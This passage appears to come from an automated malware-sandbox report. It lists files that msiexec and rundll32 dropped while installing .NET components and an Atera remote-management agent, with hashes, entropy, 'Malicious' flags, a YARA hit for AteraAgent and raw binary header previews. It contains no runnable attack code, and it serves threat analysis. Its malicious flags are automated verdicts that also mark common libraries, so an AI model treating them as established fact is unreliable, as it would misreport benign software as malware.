                                                                                                                                                                                                                                        Entropy (8bit):6.765155684437659
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:hXiqyhTO8W0iEa8LW0bEC9hvZpC01v+eUKflQnZl+T+J7g6EsNr7wyy/EPzr9XA:hqhy8VKU3hvZUy+ppHEsuB/cBQ
                                                                                                                                                                                                                                        MD5:60E8C139E673B9EB49DC83718278BC88
                                                                                                                                                                                                                                        SHA1:00A3A9CD6D3A9F52628EA09C2E645FE56EE7CD56
                                                                                                                                                                                                                                        SHA-256:B181B6B4D69A53143A97A306919BA1ADBC0B036A48B6D1D41AE7A01E8EF286CB
                                                                                                                                                                                                                                        SHA-512:AC7CB86DBF3B86F00DA7B8A246A6C7EF65A6F1C8705EA07F9B90E494B6239FB9626B55EE872A9B7F16575A60C82E767AF228B8F018D4D7B9F783EFACCCA2B103
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x.....V...V...V:i.W...V:i.WR..V.q.W...V.q.W...V.q.W...V:i.W...V:i.W...V:i.W...V...V&..Vup.W...Vup.W...VupFV...V...V...Vup.W...VRich...V................PE..L......e...........!.....<...X......Q........P...........................................@..........................G.......L..........x............|..pW...........<..T............................<..@............P..0............................text....:.......<.................. ..`.rdata.......P.......@..............@..@.data...4$...`.......N..............@....rsrc...x............X..............@..@.reloc...............^..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI6762.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2805
                                                                                                                                                                                                                                        Entropy (8bit):5.7668897285328855
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:tILbin8264hpnUHMb6P3hvKhG1kaCbD8SuhM4DdeU1DWn1hXyDZkeEVlttyXcXo:tILbnfOaHPU4yFY/pe6SmDZkeEPk
                                                                                                                                                                                                                                        MD5:28C27AE3B5C3902FDB35A77EB5A39755
                                                                                                                                                                                                                                        SHA1:0699D726BEC3EDBDC65551EB653950D81348EE3B
                                                                                                                                                                                                                                        SHA-256:C468C80530C0EA7041C3A0F24E430E18BB99FA0AEB4A16A293237C35DB935F12
                                                                                                                                                                                                                                        SHA-512:652D531EED9D6C6A72F04E97844857D99DB63481E854DB7AEDBAE79AB1511E97DFA8CF4D34F8582771B47543692D78EF3A9E7CE47B4F51401098FE3F17877116
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:...@IXOS.@.....@vOBY.@.....@.....@.....@.....@.....@......&.{667CB653-70E1-4E2B-9C8E-6A02A6CF88B9}..Microsoft .NET Host FX Resolver - 6.0.32 (x64)!.dotnet-hostfxr-6.0.32-win-x64.msi.@.....@gA.0.@.....@........&.{43DA5864-E85C-44A5-B8EC-4BB554FA8AFC}.....@.....@.....@.....@.......@.....@.....@.......@......Microsoft .NET Host FX Resolver - 6.0.32 (x64)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{E116E585-E2CE-5BAC-A645-7047860785B2}W.02:\Software\Classes\Installer\Dependencies\Dotnet_CLI_HostFxr_48.128.16743_x64\Version.@.......@.....@.....@......&.{0AC899A6-3CC6-559F-9577-67925851F466}3.C:\Program Files\dotnet\host\fxr\6.0.32\hostfxr.dll.@.......@.....@.....@......&.{8EC524B8-7864-5ACE-B320-2D36216EBC12}?.02:\SOFTWARE\dotnet\Setup\InstalledVersions\x64\hostfxr\Version.@.......@.....@.....@........InstallFiles..Copying new files&.File: [1], Dir

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI6A60.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):250736
                                                                                                                                                                                                                                        Entropy (8bit):6.765155684437659
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:hXiqyhTO8W0iEa8LW0bEC9hvZpC01v+eUKflQnZl+T+J7g6EsNr7wyy/EPzr9XA:hqhy8VKU3hvZUy+ppHEsuB/cBQ
                                                                                                                                                                                                                                        MD5:60E8C139E673B9EB49DC83718278BC88
                                                                                                                                                                                                                                        SHA1:00A3A9CD6D3A9F52628EA09C2E645FE56EE7CD56
                                                                                                                                                                                                                                        SHA-256:B181B6B4D69A53143A97A306919BA1ADBC0B036A48B6D1D41AE7A01E8EF286CB
                                                                                                                                                                                                                                        SHA-512:AC7CB86DBF3B86F00DA7B8A246A6C7EF65A6F1C8705EA07F9B90E494B6239FB9626B55EE872A9B7F16575A60C82E767AF228B8F018D4D7B9F783EFACCCA2B103
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x.....V...V...V:i.W...V:i.WR..V.q.W...V.q.W...V.q.W...V:i.W...V:i.W...V:i.W...V...V&..Vup.W...Vup.W...VupFV...V...V...Vup.W...VRich...V................PE..L......e...........!.....<...X......Q........P...........................................@..........................G.......L..........x............|..pW...........<..T............................<..@............P..0............................text....:.......<.................. ..`.rdata.......P.......@..............@..@.data...4$...`.......N..............@....rsrc...x............X..............@..@.reloc...............^..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI6E49.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):250736
                                                                                                                                                                                                                                        Entropy (8bit):6.765155684437659
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:hXiqyhTO8W0iEa8LW0bEC9hvZpC01v+eUKflQnZl+T+J7g6EsNr7wyy/EPzr9XA:hqhy8VKU3hvZUy+ppHEsuB/cBQ
                                                                                                                                                                                                                                        MD5:60E8C139E673B9EB49DC83718278BC88
                                                                                                                                                                                                                                        SHA1:00A3A9CD6D3A9F52628EA09C2E645FE56EE7CD56
                                                                                                                                                                                                                                        SHA-256:B181B6B4D69A53143A97A306919BA1ADBC0B036A48B6D1D41AE7A01E8EF286CB
                                                                                                                                                                                                                                        SHA-512:AC7CB86DBF3B86F00DA7B8A246A6C7EF65A6F1C8705EA07F9B90E494B6239FB9626B55EE872A9B7F16575A60C82E767AF228B8F018D4D7B9F783EFACCCA2B103
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x.....V...V...V:i.W...V:i.WR..V.q.W...V.q.W...V.q.W...V:i.W...V:i.W...V:i.W...V...V&..Vup.W...Vup.W...VupFV...V...V...Vup.W...VRich...V................PE..L......e...........!.....<...X......Q........P...........................................@..........................G.......L..........x............|..pW...........<..T............................<..@............P..0............................text....:.......<.................. ..`.rdata.......P.......@..............@..@.data...4$...`.......N..............@....rsrc...x............X..............@..@.reloc...............^..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI6F54.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4254
                                                                                                                                                                                                                                        Entropy (8bit):5.705012664875961
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:JLTpblU3gtEVPQHLxo2qmao3t+G3uce62bDDkrQEPtjA:VnUweUmiBL3uce6BkW2
                                                                                                                                                                                                                                        MD5:AB3F80C1EA8B65C0B0EC774E104D6A1C
                                                                                                                                                                                                                                        SHA1:8102579C4F215C378D53520AB1B9066BAD2FE809
                                                                                                                                                                                                                                        SHA-256:7F72CFB6981947906691169B02A7A28EA295CC698B89DC957F532AA6844F46C9
                                                                                                                                                                                                                                        SHA-512:528424B0F0CA7E807C8406AD2BC05CB7EABB75EB1A003B4D89B87D2C74B72620521F767D41354BB6B3FCD6A9EDBD53BA71A19376427EE091B9DBB2D15CBBEEAE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:...@IXOS.@.....@wOBY.@.....@.....@.....@.....@.....@......&.{A09F8381-88C3-44C4-9DAB-AC44F4F4DB4B}".Microsoft .NET Host - 6.0.32 (x64)..dotnet-host-6.0.32-win-x64.msi.@.....@gA.0.@.....@........&.{6CC46603-A43D-40BF-9045-9949A2B95632}.....@.....@.....@.....@.......@.....@.....@.......@....".Microsoft .NET Host - 6.0.32 (x64)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{3AB1371A-161F-5BD9-98C8-F9BF7A103CA5}X.02:\Software\Classes\Installer\Dependencies\Dotnet_CLI_SharedHost_48.3.31210_x64\Version.@.......@.....@.....@......&.{45399BBB-DDA5-4386-A2E9-618FB3C54A18}".C:\Program Files\dotnet\dotnet.exe.@.......@.....@.....@......&.{EA9C3F98-F9B1-5212-8980-CFEAF2B15E0D}B.22:\SOFTWARE\dotnet\Setup\InstalledVersions\x64\sharedhost\Version.@.......@.....@.....@......&.{E4E008C8-57A8-5040-BB34-03024B15B6C5}?.02:\SOFTWARE\dotnet\Setup\InstalledVersions\x64\

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI7187.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):250736
                                                                                                                                                                                                                                        Entropy (8bit):6.765155684437659
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:hXiqyhTO8W0iEa8LW0bEC9hvZpC01v+eUKflQnZl+T+J7g6EsNr7wyy/EPzr9XA:hqhy8VKU3hvZUy+ppHEsuB/cBQ
                                                                                                                                                                                                                                        MD5:60E8C139E673B9EB49DC83718278BC88
                                                                                                                                                                                                                                        SHA1:00A3A9CD6D3A9F52628EA09C2E645FE56EE7CD56
                                                                                                                                                                                                                                        SHA-256:B181B6B4D69A53143A97A306919BA1ADBC0B036A48B6D1D41AE7A01E8EF286CB
                                                                                                                                                                                                                                        SHA-512:AC7CB86DBF3B86F00DA7B8A246A6C7EF65A6F1C8705EA07F9B90E494B6239FB9626B55EE872A9B7F16575A60C82E767AF228B8F018D4D7B9F783EFACCCA2B103
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x.....V...V...V:i.W...V:i.WR..V.q.W...V.q.W...V.q.W...V:i.W...V:i.W...V:i.W...V...V&..Vup.W...Vup.W...VupFV...V...V...Vup.W...VRich...V................PE..L......e...........!.....<...X......Q........P...........................................@..........................G.......L..........x............|..pW...........<..T............................<..@............P..0............................text....:.......<.................. ..`.rdata.......P.......@..............@..@.data...4$...`.......N..............@....rsrc...x............X..............@..@.reloc...............^..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI72FF.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):250736
                                                                                                                                                                                                                                        Entropy (8bit):6.765155684437659
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:hXiqyhTO8W0iEa8LW0bEC9hvZpC01v+eUKflQnZl+T+J7g6EsNr7wyy/EPzr9XA:hqhy8VKU3hvZUy+ppHEsuB/cBQ
                                                                                                                                                                                                                                        MD5:60E8C139E673B9EB49DC83718278BC88
                                                                                                                                                                                                                                        SHA1:00A3A9CD6D3A9F52628EA09C2E645FE56EE7CD56
                                                                                                                                                                                                                                        SHA-256:B181B6B4D69A53143A97A306919BA1ADBC0B036A48B6D1D41AE7A01E8EF286CB
                                                                                                                                                                                                                                        SHA-512:AC7CB86DBF3B86F00DA7B8A246A6C7EF65A6F1C8705EA07F9B90E494B6239FB9626B55EE872A9B7F16575A60C82E767AF228B8F018D4D7B9F783EFACCCA2B103
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x.....V...V...V:i.W...V:i.WR..V.q.W...V.q.W...V.q.W...V:i.W...V:i.W...V:i.W...V...V&..Vup.W...Vup.W...VupFV...V...V...Vup.W...VRich...V................PE..L......e...........!.....<...X......Q........P...........................................@..........................G.......L..........x............|..pW...........<..T............................<..@............P..0............................text....:.......<.................. ..`.rdata.......P.......@..............@..@.data...4$...`.......N..............@....rsrc...x............X..............@..@.reloc...............^..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI7439.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):714
                                                                                                                                                                                                                                        Entropy (8bit):5.4403123077259
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:Eg3b0LBVevIZ+30gBGLyeIp3qj//l30gBi/fNEhHmX/qHXZNDUSEMszVltNn6evL:T0LBVk3tGeee6jV3t/QXkXZIMEVlt16G
                                                                                                                                                                                                                                        MD5:7CDD9C519347B856E05DF0A37AF6ABD8
                                                                                                                                                                                                                                        SHA1:D61C494EF054AD9A41499A5A73E297DA77E57DC1
                                                                                                                                                                                                                                        SHA-256:CFBDDEAE5C6902DFB5B4BCA6F5F1497C5201CC705E05A12948564ED0A02D28CE
                                                                                                                                                                                                                                        SHA-512:FF2FEBE7778B0442486CE9F715E4B134F858B249E506C182A8BDF137EF3F454132F149704D3F8A0C25BD17A33E65682BDA7BC3DA34A48F090B498467D282F913
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:...@IXOS.@.....@xOBY.@.....@.....@.....@.....@.....@......&.{3FDCF0A2-7C1F-41C7-9749-0D91EC216AED}%.Microsoft .NET Runtime - 6.0.32 (x64)!.dotnet-runtime-6.0.32-win-x64.msi.@.....@gA.0.@.....@........&.{81A6B662-3AB0-42DC-AE22-74E8036F80FA}.....@.....@.....@.....@.......@.....@.....@.......@....%.Microsoft .NET Runtime - 6.0.32 (x64)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........RegisterProduct..Registering product..[1]i...0......PublishProduct..Publishing product information.......@.....@.....@......&.{3FDCF0A2-7C1F-41C7-9749-0D91EC216AED}Q.C:\ProgramData\Package Cache\{3FDCF0A2-7C1F-41C7-9749-0D91EC216AED}v48.128.16743\...@.....@.....@....

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI9B15.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):521954
                                                                                                                                                                                                                                        Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                        MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                        SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                        SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                        SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................'P\....'P^....'P_...........................>.......4..................R......:...........Rich...........................PE..L....o.]...........!.....D...|.......L.......`......................................S#....@.........................0}...*......x.......d.......................4... s..T...........................xs..@............`..l............................text....B.......D.................. ..`.rdata...Q...`...R...H..............@..@.data...p...........................@....rsrc...d...........................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI9B15.tmp-\AlphaControlAgentInstallation.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25600
                                                                                                                                                                                                                                        Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                        MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                        SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                        SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                        SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSI9B15.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSI9B15.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSI9B15.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSI9B15.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSI9B15.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R..e.........." ..0..Z..........Bx... ........... ....................................`..................................w..O....................................v............................................... ............... ..H............text...HX... ...Z.................. ..`.rsrc................\..............@..@.reloc...............b..............@..B................$x......H........5...A............................................................(....r...p(.....s....o....,.r;..p(....(.... ....*r...p(.....*..0..M........(....r...p(.....s@...oA...,$(H...-..s'...r...pr;..p.o(.....o....r[..p(.....*....0..N........(....r...p(.....o....r...p..o....,..,..~.....o....,..*.s+...o,...r...p(.....*..(....r...p(.....s>...o?...rE..p(.....*..(....rm..p(.....s'...r...p..o(...r...p(.....*..(....r...p(.....s'...r...p..o(...r;..p(.....*..(....r]..p(.....s'...r...p

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI9B15.tmp-\CustomAction.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1538
                                                                                                                                                                                                                                        Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                        MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                        SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                        SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                        SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI9B15.tmp-\Microsoft.Deployment.WindowsInstaller.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):184240
                                                                                                                                                                                                                                        Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                        MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                        SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                        SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                        SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.].........." ..0...... ......z.... ........... ....................................@.................................(...O................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI9B15.tmp-\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):711952
                                                                                                                                                                                                                                        Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                        MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                        SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                        SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                        SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ............`.....................................O......................../.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI9B15.tmp-\System.Management.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):61448
                                                                                                                                                                                                                                        Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                        MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                        SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                        SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                        SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....bP.........." ..................... .........c. ....................... ......>.....`.....................................O.......\................>........................................................... ............... ..H............text........ ...................... ..`.rsrc...\...........................@..@.reloc..............................@..B........................H........"..`...........D....".......................................................................................0...............0.......................................................................0...............................................................................................................................................0...............0...................................................0...............0..............................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSIA259.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):521954
                                                                                                                                                                                                                                        Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                        MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                        SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                        SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                        SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
